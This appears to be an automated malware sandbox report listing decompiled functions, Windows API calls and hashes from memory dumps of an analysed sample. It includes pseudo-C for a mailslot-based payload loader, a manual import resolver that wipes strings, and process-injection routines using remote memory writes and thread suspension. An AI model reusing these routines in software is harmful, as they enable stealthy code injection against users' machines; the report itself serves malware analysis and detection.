Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
